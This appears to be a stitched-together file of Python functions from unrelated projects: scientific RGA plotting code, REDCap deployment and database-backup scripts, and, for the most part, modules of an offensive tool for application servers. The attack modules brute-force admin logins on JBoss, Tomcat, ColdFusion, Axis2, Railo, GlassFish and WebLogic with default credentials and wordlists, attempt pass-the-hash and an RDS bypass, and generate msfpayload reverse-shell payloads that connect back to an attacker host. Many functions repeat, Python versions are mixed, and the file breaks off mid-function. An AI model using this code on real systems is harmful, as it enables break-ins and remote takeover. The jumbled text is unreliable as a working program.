def wf_reader(filename, **kwargs):
header = kwargs.get('header', False)
delim = kwargs.get('delimeter', None)
import numpy as np
import utility as ut
datafile = open(filename, 'r')
time, columns = [], []
for line in datafile:
line = line.strip()
if len(line.split(delim)) >= 2:
time.append(line.split(delim)[1])
columns.append(line.split(delim)[2:])
datafile.close()
if header == True:
matrix = np.array(columns[1:], dtype='float')
matrix = np.hstack((ut.timestamp(time[1:], t0=True), matrix))
return columns[0], matrix
if header == False:
matrix = np.array(columns, dtype='float')
matrix = np.hstack((ut.timestamp(time, t0=True), matrix))
return matrix
def get_unix_timestamp(dt_str1, dt_str2):
try:
ts = utility.timestamp(dt_str1)
return ts
except Exception as err:
if str(err).find('must be in -1439') != -1:
new_dt1 = replace_TZ(dt_str1, dt_str2)
try:
ts = utility.timestamp(new_dt1)
return ts
except Exception as err:
fix_invalid_date(new_dt1)
else:
fix_invalid_date(dt_str1)
def define_env(settings_file_path=""):
"""
This function sets up some global variables
"""
# Set defaults
env.deploy_redcap_cron = False
# first, copy the secrets file into the deploy directory
if os.path.exists(settings_file_path):
config.read(settings_file_path)
else:
print(("The secrets file path cannot be found. It is set to: %s" % settings_file_path))
abort("Secrets File not set")
utility.get_config('deploy_user', settings_file_path)
section="instance"
for (name,value) in config.items(section):
env[name] = value
# Set variables that do not have corresponding values in vagrant.ini file
time = utility.timestamp()
env.remote_project_name = '%s-%s' % (env.project_path,time)
env.live_project_full_path = env.live_pre_path + "/" + env.project_path
env.backup_project_full_path = env.backup_pre_path + "/" + env.project_path
env.upload_project_full_path = env.backup_pre_path
env.hosts = [env.host]
env.port = env.host_ssh_port
# Turn deploy_redcap_cron into a boolean
env.deploy_redcap_cron = utility.is_affirmative(env.deploy_redcap_cron)
def waitServe(servert):
""" Small function used to wait for a _serve thread to receive
a GET request. See _serve for more information.
servert should be a running thread.
"""
timeout = 10
status = False
try:
while servert.is_alive() and timeout > 0:
stdout.flush()
stdout.write("\r\033[32m [%s] Waiting for remote server to "
"download file [%ds]" %
(utility.timestamp(), timeout))
sleep(1.0)
timeout -= 1
except:
timeout = 0
if timeout != 10:
print('')
if timeout == 0:
utility.Msg("Remote server failed to retrieve file.", LOG.ERROR)
else:
status = True
return status
def define_env(settings_file_path=""):
"""
This function sets up some global variables
"""
# Set defaults
env.deploy_redcap_cron = False
# first, copy the secrets file into the deploy directory
if os.path.exists(settings_file_path):
config.read(settings_file_path)
else:
print("The secrets file path cannot be found. It is set to: %s" %
settings_file_path)
abort("Secrets File not set")
if utility.get_config('deploy_user', settings_file_path) != "":
env.user = utility.get_config('deploy_user', settings_file_path)
section = "instance"
for (name, value) in config.items(section):
env[name] = value
# Set variables that do not have corresponding values in vagrant.ini file
time = utility.timestamp()
env.remote_project_name = '%s-%s' % (env.project_path, time)
env.live_project_full_path = env.live_pre_path + "/" + env.project_path
env.backup_project_full_path = env.backup_pre_path + "/" + env.project_path
env.upload_project_full_path = env.backup_pre_path
env.hosts = [env.host]
env.port = env.host_ssh_port
# Turn deploy_redcap_cron into a boolean
env.deploy_redcap_cron = utility.is_affirmative(env.deploy_redcap_cron)
def waitServe(servert):
""" Small function used to wait for a _serve thread to receive
a GET request. See _serve for more information.
servert should be a running thread.
"""
timeout = 10
status = False
try:
while servert.is_alive() and timeout > 0:
stdout.flush()
stdout.write("\r\033[32m [%s] Waiting for remote server to "
"download file [%ds]" % (utility.timestamp(), timeout))
sleep(1.0)
timeout -= 1
except:
timeout = 0
if timeout is not 10:
print ''
if timeout is 0:
utility.Msg("Remote server failed to retrieve file.", LOG.ERROR)
else:
status = True
return status
def checkAuth(ip, port, title):
"""
"""
if title == GINTERFACES.GAD:
url = 'http://{0}:{1}/management/domain'.format(ip, port)
# check with given auth
if state.usr_auth:
(usr, pswd) = state.usr_auth.split(':')
return _auth(usr, pswd, url)
# else try default creds
for (usr, pswd) in default_credentials:
cook = _auth(usr, pswd, url)
if cook:
return cook
# check for a supplied wordlist
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
with open(state.bf_wordlist, "r") as f:
wordlist = [
x.decode("ascii", "ignore").rstrip()
for x in f.readlines()
]
utility.Msg(
"Brute forcing %s account with %d passwords..." %
(state.bf_user, len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write(
"\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
% (utility.timestamp(), state.bf_user, idx + 1,
len(wordlist)))
cook = _auth(state.bf_user, word, url)
if cook:
print('')
if not (state.bf_user, word) in default_credentials:
default_credentials.insert(0,
(state.bf_user, word))
utility.Msg(
"Successful login %s:%s" % (state.bf_user, word),
LOG.SUCCESS)
return cook
print('')
except KeyboardInterrupt:
pass
def checkAuth(ip, port, title, version):
"""
"""
url = "http://{0}:{1}/CFIDE/administrator/enter.cfm".format(ip, port)
# check with given auth
if state.usr_auth:
(usr, pswd) = state.usr_auth.split(':')
return _auth(usr, pswd, url, version)
# else try default creds
for (usr, pswd) in default_credentials:
cook = _auth(usr, pswd, url, version)
if cook:
return cook
# if we're still here, check if they supplied a wordlist
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
try:
with open(state.bf_wordlist, 'r') as f:
# ensure everything is ascii or requests will explode
wordlist = [x.decode('ascii', 'ignore').rstrip() for x in f.readlines()]
except Exception, e:
utility.Msg("Failed to read wordlist (%s)" % e, LOG.ERROR)
return
utility.Msg("Brute forcing account %s with %d passwords..." %
(state.bf_user, len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\
% (utility.timestamp(), state.bf_user, idx+1,
len(wordlist)))
cook = _auth(state.bf_user, word, url, version)
if cook:
print '' # newline
if not (state.bf_user, word) in default_credentials:
default_credentials.insert(0, (state.bf_user, word))
utility.Msg("Successful login %s:%s" %
(state.bf_user, word), LOG.SUCCESS)
return cook
print ''
except KeyboardInterrupt:
pass
def checkAuth(ip, port, title, version):
"""
"""
url = "http://{0}:{1}/axis2/axis2-admin/login".format(ip, port)
if state.usr_auth:
(usr, pswd) = state.usr_auth.split(":")
return _auth(usr, pswd, url, version)
# try default creds
for (usr, pswd) in default_credentials:
cook = _auth(usr, pswd, url, version)
if cook:
return cook
# bruteforce
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
with open(state.bf_wordlist, 'r') as f:
# ensure its all ascii
wordlist = [
x.decode('ascii', 'ignore').rstrip() for x in f.readlines()
]
utility.Msg(
"Brute forcing %s account with %d passwords..." %
(state.bf_user, len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\
% (utility.timestamp(), state.bf_user,
idx+1, len(wordlist)))
cook = _auth(state.bf_user, word, url, version)
if cook:
print '' # newline
if not (state.bf_user, word) in default_credentials:
default_credentials.insert(0, (state.bf_user, word))
utility.Msg("Successful login %s:%s" (state.bf_user, word),
LOG.SUCCESS)
return cook
print ''
except KeyboardInterrupt:
pass
def checkAuth(ip, port, title, version):
"""
"""
if title == TINTERFACES.MAN:
url = "http://{0}:{1}/manager/html".format(ip, port)
# check with given auth
if state.usr_auth:
(usr, pswd) = state.usr_auth.split(":")
return _auth(usr, pswd, url)
# else try default credentials
for (usr, pswd) in default_credentials:
cook = _auth(usr, pswd, url)
if cook:
return cook
# if we're still here, check if they supplied a wordlist
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
with open(state.bf_wordlist, "r") as f:
wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]
utility.Msg("Brute forcing %s account with %d passwords..." %
(state.bf_user, len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
% (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))
cook = _auth(state.bf_user, word, url)
if cook:
print ''
# lets insert these credentials to the default list so we
# don't need to bruteforce it each time
if not (state.bf_user, word) in default_credentials:
default_credentials.insert(0, (state.bf_user, word))
utility.Msg("Successful login %s:%s" % (state.bf_user, word),
LOG.SUCCESS)
return cook
print ''
except KeyboardInterrupt:
pass
def checkAuth(ip, port, title):
""" Railo doesn't have usernames, so we only care about passwords
"""
url = None
if title is RINTERFACES.WEB:
url = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, port)
elif title is RINTERFACES.SRV:
url = "http://{0}:{1}/railo-context/admin/server.cfm".format(ip, port)
else:
utility.Msg("Interface %s not supported yet." % title, LOG.DEBUG)
return
if state.usr_auth:
# check with given auth; handle both cases of "default" and ":default"
if ':' in state.usr_auth:
(_, pswd) = state.usr_auth.split(":")
else:
pswd = state.usr_auth
return _auth(pswd, url, title)
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
with open(state.bf_wordlist, "r") as f:
wordlist = [
x.decode("ascii", "ignore").rstrip() for x in f.readlines()
]
utility.Msg(
"Brute forcing %s with %d passwords..." %
(state.bf_user, len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write(
"\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
% (utility.timestamp(), state.bf_user, idx + 1,
len(wordlist)))
cook = _auth(word, url, title)
if cook:
print ''
utility.Msg("Successful login with %s" % word, LOG.SUCCESS)
return cook
print ''
except KeyboardInterrupt:
pass
def checkAuth(ip, port, title):
"""
"""
if title == GINTERFACES.GAD:
url = 'http://{0}:{1}/management/domain'.format(ip, port)
# check with given auth
if state.usr_auth:
(usr, pswd) = state.usr_auth.split(':')
return _auth(usr, pswd, url)
# else try default creds
for (usr, pswd) in default_credentials:
cook = _auth(usr, pswd, url)
if cook:
return cook
# check for a supplied wordlist
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
with open(state.bf_wordlist, "r") as f:
wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]
utility.Msg("Brute forcing %s account with %d passwords..." %
(state.bf_user, len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
% (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))
cook = _auth(state.bf_user, word, url)
if cook:
print ''
if not (state.bf_user, word) in default_credentials:
default_credentials.insert(0, (state.bf_user, word))
utility.Msg("Successful login %s:%s" % (state.bf_user, word),
LOG.SUCCESS)
return cook
print ''
except KeyboardInterrupt:
pass
def checkAuth(ip, port, title, version):
"""
"""
url = "http://{0}:{1}/axis2/axis2-admin/login".format(ip, port)
if state.usr_auth:
(usr, pswd) = state.usr_auth.split(":")
return _auth(usr, pswd, url, version)
# try default creds
for (usr, pswd) in default_credentials:
cook = _auth(usr, pswd, url, version)
if cook:
return cook
# bruteforce
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
with open(state.bf_wordlist, 'r') as f:
# ensure its all ascii
wordlist = [x.decode('ascii', 'ignore').rstrip() for x in f.readlines()]
utility.Msg("Brute forcing %s account with %d passwords..." %
(state.bf_user, len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\
% (utility.timestamp(), state.bf_user,
idx+1, len(wordlist)))
cook = _auth(state.bf_user, word, url, version)
if cook:
print '' # newline
if not (state.bf_user, word) in default_credentials:
default_credentials.insert(0, (state.bf_user, word))
utility.Msg("Successful login %s:%s"
(state.bf_user, word), LOG.SUCCESS)
return cook
print ''
except KeyboardInterrupt:
pass
def backup_database(options=""):
"""
Backup a mysql database from the remote host with mysqldump options in *options*.
The backup file will be time stamped with a name like 'redcap-<instance_name>-20170126T1620.sql.gz'
The latest backup file will be linked to name 'redcap-<instance_name>-latest.sql.gz'
"""
utility.write_remote_my_cnf()
now = utility.timestamp()
with settings(user=env.deploy_user):
run("mysqldump --skip-lock-tables %s -u %s -h %s %s | gzip > redcap-%s-%s.sql.gz" % \
(options, env.database_user, env.database_host, env.database_name, env.instance_name, now))
run("ln -sf redcap-%s-%s.sql.gz redcap-%s-latest.sql.gz" % (env.instance_name, now, env.instance_name))
utility.delete_remote_my_cnf()
def run(options):
""" This module is used for generating reverse shell payloads. It's not
flexible in what sorts of payloads it can generate, but this is by design.
Highly customized payloads, or stuff like meterpreter/reverse java payloads
should be generated using proper tools, such as msfpayload. This is merely
a quick way for us to get a reverse shell on a remote system.
"""
if not options.remote_os:
utility.Msg("Please specify a remote os (-o)", LOG.ERROR)
return
if not options.remote_service:
utility.Msg("Please specify a remote service (-a)", LOG.ERROR)
return
elif options.remote_service in ["coldfusion"]:
out = "R > shell.jsp"
if getoutput("which msfpayload") == "":
utility.Msg("This option requires msfpayload", LOG.ERROR)
return
payload = fetch_payload(options)
out = "W > shell.war"
if not payload:
utility.Msg(
"Platform %s unsupported" % fingerengine.options.remote_service,
LOG.ERROR)
return
utility.Msg("Generating payload....")
(lhost, lport) = options.generate_payload.split(":")
resp = getoutput("msfpayload %s LHOST=%s LPORT=%s %s &>/dev/null" %
(payload, lhost, lport, out))
if "Created by" in resp:
utility.Msg("Payload generated (%s). Payload: %s" %
(out.split(' ')[2], payload))
# also log some auxiliary information
getoutput("echo Generated at %s > ./src/lib/shell.log" %
utility.timestamp())
getoutput("echo %s:%s >> ./src/lib/shell.log" % (lhost, lport))
getoutput("echo %s >> ./src/lib/shell.log" % (payload))
else:
utility.Msg("Error generating payload: %s" % resp, LOG.ERROR)
def backup_database(options=""):
"""
Backup a mysql database from the remote host with mysqldump options in *options*.
The backup file will be time stamped with a name like 'redcap-<instance_name>-20170126T1620.sql.gz'
The latest backup file will be linked to name 'redcap-<instance_name>-latest.sql.gz'
"""
utility.write_remote_my_cnf()
now = utility.timestamp()
with settings(user=env.deploy_user):
run("mysqldump --skip-lock-tables %s -u %s -h %s %s | gzip > redcap-%s-%s.sql.gz" % \
(options, env.database_user, env.database_host, env.database_name, env.instance_name, now))
run("ln -sf redcap-%s-%s.sql.gz redcap-%s-latest.sql.gz" %
(env.instance_name, now, env.instance_name))
utility.delete_remote_my_cnf()
def checkAuth(ip, port, title):
""" Railo doesn't have usernames, so we only care about passwords
"""
url = None
if title is RINTERFACES.WEB:
url = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, port)
elif title is RINTERFACES.SRV:
url = "http://{0}:{1}/railo-context/admin/server.cfm".format(ip, port)
else:
utility.Msg("Interface %s not supported yet." % title, LOG.DEBUG)
return
if state.usr_auth:
# check with given auth; handle both cases of "default" and ":default"
if ':' in state.usr_auth:
(_, pswd) = state.usr_auth.split(":")
else:
pswd = state.usr_auth
return _auth(pswd, url, title)
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
with open(state.bf_wordlist, "r") as f:
wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]
utility.Msg("Brute forcing %s with %d passwords..." % (state.bf_user,
len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
% (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))
cook = _auth(word, url, title)
if cook:
print ''
utility.Msg("Successful login with %s" % word, LOG.SUCCESS)
return cook
print ''
except KeyboardInterrupt:
pass
def run(options):
""" This module is used for generating reverse shell payloads. It's not
flexible in what sorts of payloads it can generate, but this is by design.
Highly customized payloads, or stuff like meterpreter/reverse java payloads
should be generated using proper tools, such as msfpayload. This is merely
a quick way for us to get a reverse shell on a remote system.
"""
PAYLOAD = "java/jsp_shell_reverse_tcp"
if not options.remote_service:
utility.Msg("Please specify a remote service (-a)", LOG.ERROR)
return
elif options.remote_service in ["coldfusion"]:
out = "R > shell.jsp"
else:
out = "W > shell.war"
if getoutput("which msfpayload") == "":
utility.Msg("This option requires msfpayload", LOG.ERROR)
return
utility.Msg("Generating payload....")
(lhost, lport) = options.generate_payload.split(":")
resp = getoutput("msfpayload %s LHOST=%s LPORT=%s %s &>/dev/null" %
(PAYLOAD, lhost, lport, out))
if "Created by" in resp:
utility.Msg("Payload generated (%s). Payload: %s" % (out.split(' ')[2], PAYLOAD))
# also log some auxiliary information
getoutput("echo Generated at %s > ./src/lib/shell.log" % utility.timestamp())
getoutput("echo %s:%s >> ./src/lib/shell.log" % (lhost, lport))
getoutput("echo %s >> ./src/lib/shell.log" % (PAYLOAD))
else:
utility.Msg("Error generating payload: %s" % resp, LOG.ERROR)
def get_unix_timestamp(dt_str):
try:
ts = utility.timestamp(dt_str)
return ts
except Exception as err:
fix_invalid_date(dt_str)
def fix_invalid_date(dt_str): # handle datetime with wrong TZ or date older than 1970-01-01
try:
return utility.timestamp(dt_str[:19] + '+00:00')
except Exception as err:
return utility.timestamp('1970-01-01T00:00:00+00:00')
def checkAuth(ip, port, title, version):
"""
"""
if version in ["5.1", "6.0", "6.1"] and title is JINTERFACES.WM:
for (usr, pswd) in default_credentials:
url = "http://%s:%s/admin-console/login.seam" % (ip, port)
data = OrderedDict([
("login_form", "login_form"),
("login_form:name", usr),
("login_form:password", pswd),
("login_form:submit", "Login"),
("javax.faces.ViewState", utility.fetch_viewState(url)),
])
response = utility.requests_post(url, data=data)
if response.status_code == 200:
utility.Msg(
"Successfully authenticated with %s:%s" % (usr, pswd),
LOG.DEBUG)
if version in ["5.1"]:
return (dict_from_cookiejar(response.history[0].cookies),
None)
return (dict_from_cookiejar(response.cookies), None)
else:
if title is JINTERFACES.JMX:
url = "http://%s:%s/jmx-console/" % (ip, port)
elif title is JINTERFACES.MM:
url = "http://%s:%s/management" % (ip, port)
elif title is JINTERFACES.WC:
url = "http://%s:%s/web-console" % (ip, port)
else:
utility.Msg("Unsupported auth interface: %s" % title, LOG.DEBUG)
return
# check with given auth
if state.usr_auth:
(usr, pswd) = state.usr_auth.split(':')
return _auth(usr, pswd, url, version)
# else try default credentials
for (usr, pswd) in default_credentials:
cook = _auth(usr, pswd, url, version)
if cook:
return cook
# if we're still here, check if they supplied a wordlist
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
with open(state.bf_wordlist, 'r') as f:
# ensure everything is ascii or requests will explode
wordlist = [
x.decode("ascii", "ignore").rstrip()
for x in f.readlines()
]
utility.Msg(
"Brute forcing %s account with %d passwords..." %
(state.bf_user, len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" \
% (utility.timestamp(), state.bf_user,
idx+1, len(wordlist)))
cook = _auth(state.bf_user, word, url, version)
if cook:
print('') # newline
# lets insert these credentials to the default list so we
# don't need to bruteforce it each time
if not (state.bf_user, word) in default_credentials:
default_credentials.insert(0,
(state.bf_user, word))
utility.Msg(
"Successful login %s:%s" % (state.bf_user, word),
LOG.SUCCESS)
return cook
print('')
except KeyboardInterrupt:
pass
# exploitation engine for the service
utility.Msg("Loading auxiliary for '%s'..." % fingerengine.service,
LOG.DEBUG)
# execute the auxiliary engine
auxengine(fingerengine)
if __name__ == "__main__":
utility.header()
options = parse(sys.argv[1:])
# set platform
state.platform = platform.system().lower()
utility.Msg("Started at %s" % (utility.timestamp()))
# log the CLI args
utility.log(' '.join(sys.argv))
try:
prerun(options)
if options.ip or options.input_list:
run(options)
postrun(options)
except KeyboardInterrupt:
pass
utility.Msg("Finished at %s" % (utility.timestamp()))
def rga_plot(filepath, **kwargs):
# Define keyword arguments
chan2plot = kwargs.get('chan2plot', 'all')
bounds = kwargs.get('bounds', 'full')
yscale = kwargs.get('yscale', 'linear')
tag = kwargs.get('tag', '')
o = kwargs.get('overlay', False)
col = kwargs.get('colors', 'default')
style = kwargs.get('style', '-')
date2 = kwargs.get('date', 'same')
if date2 != 'same':
date = date2
if date2 == 'same':
date = date_g
# Import modules
import numpy as np
import matplotlib.pyplot as plt
import utility as ut
# Get the data from the file using rga_read
species, p_data = rga_read(filepath, date=date2)
species, p_data = rga_read(filepath, date=date2)
# Separate time and pressure data
time = p_data[:, 0]
p_data = p_data[:, 1:]
dt = ut.avediff(time)
# Deal with plotting bounds
if bounds == 'full':
bounds_s = [np.amin(time), np.amax(time)]
bound_i = [0, len(time) - 1]
# Convert time to seconds
if bounds != 'full':
bounds_s = ut.timestamp(bounds)
# Find the index of the time closest to bounds
bound_index = []
for k in range(2):
j = -1
for i in time[1:]:
j = j + 1
if i < bounds_s[k]:
last_time = i
else:
a = abs(bounds_s[k] - last_time)
b = abs(i - bounds_s[k])
if a > b:
bound_index.append(j)
break
else:
bound_index.append(j - 1)
break
bound_i = ut.bound_finder(time, bounds_s)
# Deal with which channels to intt
if chan2plot == 'all':
chan2plot = species
if chan2plot == 'AllXenon':
chan2plot = ['Xenon129', 'Xenon131', 'Xenon132', 'Xenon134']
# Plot the lines
plt.figure('rga_plot')
plt.clf()
j = 0
figtext = ''
for i in chan2plot:
if i == 'Nitrogen':
col = 'FireBrick'
if i == 'Oxygen':
col = 'Turquoise'
if i == 'Hydrogen':
col = 'Goldenrod'
if i == 'CarbonDioxide':
col = 'DarkGreen'
if i == 'Water':
col = 'MidnightBlue'
if i == 'Xenon129':
col = 'Violet'
if i == 'Xenon131':
col = 'DarkViolet'
if i == 'Xenon132':
col = 'DarkMagenta'
if i == 'Xenon134':
col = 'DarkSlateBlue'
if i == 'Argon':
col = 'DeepPink'
if i == 'mass83':
col = 'DodgerBlue'
if i == 'Barium138':
col = 'DodgerBlue'
plt.plot(time[bound_i[0]:bound_i[1]],
p_data[bound_i[0]:bound_i[1],
species.index(i)],
color=col,
label=i)
plt.xlim(time[bound_i[0]], time[bound_i[1]])
if yscale == 'log':
ut.log()
if yscale == 'linear':
ut.sci()
plt.xlabel('Time (s)')
plt.ylabel('Partial Pressure (Torr)')
plt.title(str(date) + ' pvt' + str(filepath))
plt.legend(fontsize=12)
plt.show()
utility.Msg("Fingerprinting completed.", LOG.UPDATE)
# We've got the host fingerprinted, now kick off the
# exploitation engine for the service
utility.Msg("Loading auxiliary for '%s'..." % fingerengine.service,
LOG.DEBUG)
# execute the auxiliary engine
auxengine(fingerengine)
if __name__ == "__main__":
utility.header()
options = parse(sys.argv[1:])
utility.Msg("Started at %s" % (utility.timestamp()))
# log the CLI args
utility.log(' '.join(sys.argv))
try:
prerun(options)
if options.ip or options.input_list:
run(options)
postrun(options)
except KeyboardInterrupt:
pass
utility.Msg("Finished at %s" % (utility.timestamp()))
def rga_int(filepath, bounds, **kwargs):
# Define keyword arguments
chan2int = kwargs.get('chan2int', 'all')
yscale = kwargs.get('yscale', 'log')
col = kwargs.get('colors', 'default')
output = kwargs.get('store', False)
pltsub = kwargs.get('plt_sub', False)
bndtype = kwargs.get('boundtype', 'edge')
# Import modules
import numpy as np
import matplotlib.pyplot as plt
import utility as ut
# Get the data from the file using rga_read
species, p_data = rga_read(filepath)
# Separate time and pressure data
time = p_data[:, 0]
p_data = p_data[:, 1:]
dt = ut.avediff(time)
# Convert time to seconds
if type(bounds[0]) == str:
bounds = ut.timestamp(bounds)
if bndtype == 'front':
bounds = [bounds[0], bounds[0] + bounds[1]]
# Find the index of the time closest to bounds
bound_i = ut.bound_finder(time, bounds)
# Deal with which channels to integrate
if chan2int == 'all':
chan2int = species
if chan2int == 'AllXenon':
chan2int = ['Xenon129', 'Xenon131', 'Xenon132', 'Xenon134']
# Integrate selected channels over bounds
ints, bg = [], []
for i in chan2int:
bg.append(np.mean(p_data[bound_i[0] - 20:bound_i[0],
species.index(i)]))
ints.append(
np.sum(p_data[bound_i[0]:bound_i[1],
species.index(i)]) - bg[-1])
# Plot the lines
plt.figure('rga_int')
plt.clf()
j = 0
figtext = ''
for i in chan2int:
if i == 'Nitrogen':
col = 'FireBrick'
if i == 'Oxygen':
col = 'Turquoise'
if i == 'Hydrogen':
col = 'Goldenrod'
if i == 'CarbonDioxide':
col = 'DarkGreen'
if i == 'Water':
col = 'MidnightBlue'
if i == 'Xenon129':
col = 'Violet'
if i == 'Xenon131':
col = 'DarkViolet'
if i == 'Xenon132':
col = 'DarkMagenta'
if i == 'Xenon134':
col = 'DarkSlateBlue'
if i == 'Argon':
col = 'DeepPink'
if i == 'mass83':
col = 'DodgerBlue'
if pltsub == True:
plt.plot(time[bound_i[0] - 10:bound_i[1] + 10],
p_data[bound_i[0] - 10:bound_i[1] + 10,
species.index(i)] - bg[j],
color=col,
label=i)
if pltsub == False:
plt.plot(time[bound_i[0] - 10:bound_i[1] + 10],
p_data[bound_i[0] - 10:bound_i[1] + 10,
species.index(i)],
color=col,
label=i)
if j == 0:
figtext += i + ': ' + ut.conv(ints[j]) + 'Torr'
if j > 0:
figtext += '\n' + i + ': ' + ut.conv(ints[j]) + 'Torr'
j += 1
plt.xlim(time[bound_i[0] - 5], time[bound_i[1] + 5])
plt.axvline(bounds[0], color='black', ls='--')
plt.axvline(bounds[1], color='black', ls='--')
if yscale == 'log':
ut.log()
if yscale == 'linear':
ut.sci()
plt.xlabel('Time (s)')
plt.ylabel('Partial Pressure (Torr)')
plt.title(str(date) + ' RGA integral')
ut.textbox(figtext, [.05, .95])
plt.legend()
plt.show()
if output == True:
return ints
def checkAuth(ip, fingerprint, returnCookie = False):
""" Default behavior is to simply return True/False based on
whether or not authentication with the credentials was successful.
If returnCookie is set to true, we return the required auth cookie.
Returns a tuple of (usr, pswd) in the event of a success, otherwise
(None, None) is returned.
"""
# check with given auth
if state.usr_auth:
(usr, pswd) = state.usr_auth.split(':')
auth = _auth(usr, pswd, ip, fingerprint)
if auth:
return auth
# else try default credentials
for (usr, pswd) in default_credentials:
auth = _auth(usr, pswd, ip, fingerprint)
if auth:
return auth
# if we're still here, lets check for a wordlist
if state.bf_wordlist and not state.hasbf:
#
# by default, certain WebLogic servers have a lockout of 5 attempts
# before a 30 minute lock. Lets confirm the user knows this.
#
tmp = utility.capture_input("WebLogic has a lockout after 5 attempts. Continue? [Y/n]")
if 'n' in tmp: return (None, None)
state.hasbf = True
wordlist = []
try:
with open(state.bf_wordlist, 'r') as f:
wordlist = [x.decode('ascii', "ignore").rstrip() for x in f.readlines()]
except Exception, e:
utility.Msg(e, LOG.DEBUG)
return (None, None)
utility.Msg('Brute forcing %s account with %d passwords...' %
(state.bf_user, len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" \
% (utility.timestamp(), state.bf_user,
idx+1, len(wordlist)))
auth = _auth(state.bf_user, word, ip, fingerprint)
if auth:
print ''
# insert creds into default cred list
if not (state.bf_user, word) in default_credentials:
default_credentials.insert(0, (state.bf_user, word))
utility.Msg("Successful login %s:%s" %
(state.bf_user, word), LOG.SUCCESS)
return auth
print ''
except KeyboardInterrupt:
pass
def checkAuth(ip, port, title, version):
"""
"""
url = "http://{0}:{1}/CFIDE/administrator/enter.cfm".format(ip, port)
if version in ['5.0']:
url = 'http://{0}:{1}/CFIDE/administrator/index.cfm'.format(ip, port)
# check with given auth
if state.usr_auth:
if version in ['7.0', '8.0', '9.0'] and len(state.usr_auth) >= 40:
# try pth
cook = attemptPTH(url, state.usr_auth)
if cook:
return cook
if ':' in state.usr_auth:
(usr, pswd) = state.usr_auth.split(':')
else:
(usr, pswd) = "admin", state.usr_auth
return _auth(usr, pswd, url, version)
# else try default creds
for (usr, pswd) in default_credentials:
cook = _auth(usr, pswd, url, version)
if cook:
return cook
# if we're 9.x, we can use the RDS bypass
if version in ["9.0"]:
cook = attemptRDS(ip, port)
if cook:
return cook
# if we're still here, check if they supplied a wordlist
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
try:
with open(state.bf_wordlist, 'r') as f:
# ensure everything is ascii or requests will explode
wordlist = [
x.decode('ascii', 'ignore').rstrip()
for x in f.readlines()
]
except Exception, e:
utility.Msg("Failed to read wordlist (%s)" % e, LOG.ERROR)
return
utility.Msg(
"Brute forcing account %s with %d passwords..." %
(state.bf_user, len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\
% (utility.timestamp(), state.bf_user, idx+1,
len(wordlist)))
cook = _auth(state.bf_user, word, url, version)
if cook:
print '' # newline
if not (state.bf_user, word) in default_credentials:
default_credentials.insert(0, (state.bf_user, word))
utility.Msg(
"Successful login %s:%s" % (state.bf_user, word),
LOG.SUCCESS)
return cook
print ''
except KeyboardInterrupt:
pass
def run(options):
""" This module is used for generating reverse shell payloads. It's not
flexible in what sorts of payloads it can generate, but this is by design.
Highly customized payloads, or stuff like meterpreter/reverse java payloads
should be generated using proper tools, such as msfpayload. This is merely
a quick way for us to get a reverse shell on a remote system.
"""
PAYLOAD = "java/jsp_shell_reverse_tcp"
SHELL = "cmd.exe"
if not options.remote_service:
utility.Msg("Please specify a remote service (-a)", LOG.ERROR)
return
elif not options.remote_os:
utility.Msg("Please specify a remote OS (-o)", LOG.ERROR)
return
elif options.remote_service in ["coldfusion"]:
out = "R > shell.jsp"
elif options.remote_service in ["axis2"]:
PAYLOAD = "java/meterpreter/reverse_tcp"
out = "R > shell.jar"
else:
out = "W > shell.war"
if options.remote_os != "windows":
SHELL = "/bin/bash"
if getoutput("which msfpayload") == "":
utility.Msg("This option requires msfpayload", LOG.ERROR)
return
utility.Msg("Generating payload....")
(lhost, lport) = options.generate_payload.split(":")
